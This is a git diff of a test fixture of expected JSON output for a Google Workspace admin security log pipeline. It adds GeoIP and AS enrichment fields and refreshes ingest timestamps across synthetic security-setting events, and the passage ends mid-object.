02d23d9551d..7dc9779104c 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079532100Z", + "ingested": "2021-12-14T14:44:50.020594746Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ALLOW_STRONG_AUTHENTICATION", @@ -101,6 +113,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -110,7 +134,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079537900Z", + "ingested": "2021-12-14T14:44:50.020597563Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ALLOW_SERVICE_FOR_OAUTH2_ACCESS", @@ -168,6 +192,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -177,7 +213,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079543500Z", + "ingested": "2021-12-14T14:44:50.020597999Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "DISALLOW_SERVICE_FOR_OAUTH2_ACCESS", @@ -233,6 +269,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -242,7 +290,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079548Z", + "ingested": "2021-12-14T14:44:50.020598437Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID", @@ -298,6 +346,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -307,7 +367,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079553600Z", + "ingested": "2021-12-14T14:44:50.020598773Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ADD_TO_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", "provider": "admin", "action": "ADD_TO_TRUSTED_OAUTH2_APPS", @@ -362,6 +422,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -371,7 +443,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079558700Z", + "ingested": "2021-12-14T14:44:50.020599110Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"REMOVE_FROM_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", "provider": "admin", "action": "REMOVE_FROM_TRUSTED_OAUTH2_APPS", @@ -428,6 +500,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -437,7 +521,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079563900Z", + "ingested": "2021-12-14T14:44:50.020599448Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"BLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "BLOCK_ON_DEVICE_ACCESS", @@ -492,6 +576,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -501,7 +597,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079570300Z", + "ingested": "2021-12-14T14:44:50.020599779Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION", @@ -557,6 +653,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -566,7 +674,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079576700Z", + "ingested": "2021-12-14T14:44:50.020600112Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_TWO_STEP_VERIFICATION_FREQUENCY", @@ -622,6 +730,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -631,7 +751,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079583Z", + "ingested": "2021-12-14T14:44:50.020600475Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION", @@ -687,6 +807,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -696,7 +828,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079589500Z", + "ingested": "2021-12-14T14:44:50.020600806Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_START_DATE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_TWO_STEP_VERIFICATION_START_DATE", @@ -752,6 +884,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -761,7 +905,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079596200Z", + "ingested": "2021-12-14T14:44:50.020601315Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"ALLOWED_TWO_STEP_VERIFICATION_METHOD\",\"value\":\"ONLY_SECURITY_KEY\"}]}}", "provider": "admin", "action": "CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS", @@ -815,6 +959,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -824,7 +980,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079602500Z", + "ingested": "2021-12-14T14:44:50.020601656Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TOGGLE_CAA_ENABLEMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_CAA_ENABLEMENT", @@ -877,6 +1033,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -886,7 +1054,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079608800Z", + "ingested": "2021-12-14T14:44:50.020601987Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_ERROR_MESSAGE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_CAA_ERROR_MESSAGE", @@ -941,6 +1109,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -950,7 +1130,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079615100Z", + "ingested": "2021-12-14T14:44:50.020602322Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_APP_ASSIGNMENTS\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CAA_ASSIGNMENTS_NEW\",\"value\":\"new\"},{\"name\":\"CAA_ASSIGNMENTS_OLD\",\"value\":\"old\"},{\"name\":\"GROUP_NAME\",\"value\":\"group\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_CAA_APP_ASSIGNMENTS", @@ -1005,6 +1185,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1014,7 +1206,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079621300Z", + "ingested": "2021-12-14T14:44:50.020602677Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UNTRUST_DOMAIN_OWNED_OAUTH2_APPS", @@ -1069,6 +1261,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1078,7 +1282,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079627800Z", + "ingested": "2021-12-14T14:44:50.020603134Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "TRUST_DOMAIN_OWNED_OAUTH2_APPS", @@ -1100,18 +1304,6 @@ ] }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -1144,8 +1336,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:53.079634100Z", + "ingested": "2021-12-14T14:44:50.020603483Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY", @@ -1169,6 +1382,9 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" @@ -1208,6 +1424,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1217,7 +1445,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079640400Z", + "ingested": "2021-12-14T14:44:50.020603817Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENFORCE_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "ENFORCE_STRONG_AUTHENTICATION", @@ -1271,6 +1499,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1280,7 +1520,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079646700Z", + "ingested": "2021-12-14T14:44:50.020604148Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS", @@ -1303,18 +1543,6 @@ ] }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -1347,8 +1575,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:53.079652900Z", + "ingested": "2021-12-14T14:44:50.020604479Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED", @@ -1372,6 +1621,9 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" @@ -1411,6 +1663,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1420,7 +1684,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079659200Z", + "ingested": "2021-12-14T14:44:50.020604813Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"SESSION_CONTROL_SETTINGS_CHANGE\",\"parameters\":[{\"name\":\"REAUTH_APPLICATION\",\"value\":\"ADMIN_CONSOLE\"},{\"name\":\"REAUTH_SETTING_NEW\",\"value\":\"INHERIT\"},{\"name\":\"REAUTH_SETTING_OLD\",\"value\":\"NEVER\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "SESSION_CONTROL_SETTINGS_CHANGE", @@ -1474,6 +1738,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1483,7 +1759,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079665Z", + "ingested": "2021-12-14T14:44:50.020605138Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_SESSION_LENGTH\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_SESSION_LENGTH", @@ -1541,6 +1817,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + 